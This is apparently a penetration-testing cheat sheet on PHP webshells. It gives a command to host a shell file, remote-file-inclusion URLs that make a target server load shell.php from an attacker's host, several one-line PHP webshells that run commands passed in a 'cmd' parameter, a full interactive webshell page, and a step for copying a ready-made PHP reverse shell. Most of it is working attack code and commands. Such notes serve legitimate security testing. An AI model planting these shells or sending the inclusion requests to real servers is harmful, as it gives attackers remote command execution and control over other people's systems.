Webshell (PHP)

A webshell is a script that enables remote command execution on a web server. Below are common PHP webshell examples and usage tips for penetration testing.

Hosting a Webshell

To serve a local file for remote inclusion:

python -m http.server 80

Example vulnerable request:

http://10.10.10.10/index.php?page=http://192.168.0.1/shell.php
http://10.10.10.10/index.php?page=http://192.168.0.1/shell.php%00

Simple PHP Webshells

<?php system("whoami"); ?>

<?php system($_GET["cmd"]);?>

<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>

<?php passthru($_GET["cmd"]);?>

<?php echo shell_exec("whoami");?>

Interactive Webshell Example

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

Reverse Shell

Copy a ready-made reverse shell:

sudo cp /usr/share/webshells/php/php-reverse-shell.php .

Hosting a Webshell​

Simple PHP Webshells​

Interactive Webshell Example​

Reverse Shell​

Hosting a Webshell

Simple PHP Webshells

Interactive Webshell Example

Reverse Shell